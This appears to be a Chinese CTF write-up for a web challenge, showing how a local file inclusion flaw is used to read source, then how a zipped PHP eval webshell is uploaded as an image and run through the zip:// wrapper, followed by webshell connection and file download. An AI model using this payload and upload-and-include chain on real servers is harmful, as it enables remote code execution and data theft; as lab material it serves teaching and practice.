简介 :
Document
(破解人数:3)
描述:啥都没有,慢慢找吧。。。
http://218.76.35.74:20129
源码中发现 include.php
image.png
image.png
http://218.76.35.74:20129/include.php?file=php://filter/read=convert.base64-encode/resource=include
image.png
image.png
image.png
观察 upload.php 的源码 , 发现并没有对文件的内容进行检测
只需要上传一个文件 , 然后再用 include 去包含即可
image.png
可以看到包含的时候过滤了 %00 , 很奇怪这里直接过滤的是 %00
我们知道 apache 在给 php cgi 传递 http 的请求参数的时候
是会进行一次 url 解码的 , 感觉这里的 %00 没卵用
之过滤了这些协议 , 并没有过滤 phar / zip 等协议
可以直接使用 zip 协议去包含上传的文件 (因为文件名也是直接用户可控的)
给出利用脚本 :
echo '<?php eval($_REQUEST[c]);?>' > c.php
zip -9r data.zip c.php
upload.py
#!/usr/bin/env python
# encoding: utf-8
import requests
url = "http://218.76.35.74:20129/upload.php"
files = {'file': ('1.jpg', open("data.zip").read(), 'image/jpeg')}
response = requests.post(url, files=files)
print response.content
成功上传以后直接包含即可
http://218.76.35.74:20129/include.php?file=zip://upload/1.jpg%23c&c=phpinfo();('ps aux');
image.png
然后直接使用 Webshell-Sniper 进行连接 :
image.png
直接进行本地文件下载
image.png
image.png
网友评论
试试find / | grep flag